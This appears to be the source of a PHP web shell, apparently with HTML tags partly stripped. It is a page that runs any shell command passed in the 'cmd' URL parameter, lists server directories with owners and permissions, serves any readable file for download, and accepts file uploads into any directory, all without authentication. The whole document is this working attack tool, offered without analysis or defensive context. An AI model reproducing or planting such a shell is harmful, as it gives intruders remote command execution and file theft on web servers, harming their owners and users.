if (isset($_GET['download'])) { $file = $_GET['download']; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit; }}<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css"><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script><script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script><div class="container">function printPerms($file) { $mode = fileperms($file); if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; $world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); return $s;}$dir = $_GET['dir'];if (isset($_POST['dir'])) { $dir = $_POST['dir'];}$file = '';if ($dir == NULL or !is_dir($dir)) { if (is_file($dir)) { echo "enters"; $file = $dir; echo $file; } $dir = './';}$dir = realpath($dir.'/'.$value);$dirs = scandir($dir);echo "

Viewing directory " . $dir . "

";echo "\n
";echo "\n
\n<div class='navbar-form'>

\n";echo "<input type='hidden' name='dir' value='".$_GET['dir']."'/> ";echo "<input type='file' name='fileToUpload' id='fileToUpload'>\n
<input type='submit' value='Upload File' name='submit'>";echo "</div>";if (isset($_POST['submit'])) { $uploadDirectory = $dir.'/'.basename($_FILES['fileToUpload']['name']); if (file_exists($uploadDirectory)) { echo "

<b style='color:red'>Error. File already exists in ".$uploadDirectory.".

"; } else if (move_uploaded_file($_FILES['fileToUpload']['tmp_name'], $uploadDirectory)) { echo '

File '.$_FILES['fileToUpload']['name'].' uploaded successfully in '.$dir.' !
'; } else { echo '

<b style="color:red">Error uploading file '.$uploadDirectory.'

'; }}if (isset($_GET['cmd'])) { echo "

Result of command execution:
"; exec('cd '.$dir.' && '.$_GET['cmd'], $cmdresult); foreach ($cmdresult as $key => $value) { echo "$value \n
"; }}echo "
";<table class="table table-hover table-bordered"> <thead> <th>Name</th> <th>Owner</th> <th>Permissions</th> </thead> <tbody>foreach ($dirs as $key => $value) { echo ""; if (is_dir(realpath($dir.'/'.$value))) { echo "<a href='". $_SERVER['PHP_SELF'] . "?dir=". realpath($dir.'/'.$value) . "/'>". $value . "</a>". posix_getpwuid(fileowner($dir.'/'.$value))[name] . " " . printPerms($dir) . "\n"; } else { echo "<a href='". $_SERVER['PHP_SELF'] . "?download=". realpath($dir.'/'.$value) . "'>". $value . "</a>". posix_getpwuid(fileowner($dir.'/'.$value))[name] ." " . printPerms($dir) . "\n"; } echo "";}echo "</tbody>";echo "";</div>